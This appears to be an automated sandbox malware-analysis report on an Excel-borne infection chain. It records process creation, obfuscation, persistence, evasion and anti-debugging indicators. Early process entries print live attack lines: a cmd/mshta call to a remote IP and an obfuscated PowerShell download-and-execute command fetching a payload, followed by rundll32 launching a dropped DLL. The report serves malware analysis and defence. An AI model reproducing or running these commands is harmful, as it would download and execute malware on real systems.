Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: 4173.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x94782

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2192 Thread sleep time: -240000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344087 mov eax, dword ptr fs:[00000030h] 9_2_00344087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4087 mov eax, dword ptr fs:[00000030h] 10_2_001D4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364087 mov eax, dword ptr fs:[00000030h] 11_2_00364087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4087 mov eax, dword ptr fs:[00000030h] 13_2_003C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00204087 mov eax, dword ptr fs:[00000030h] 14_2_00204087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
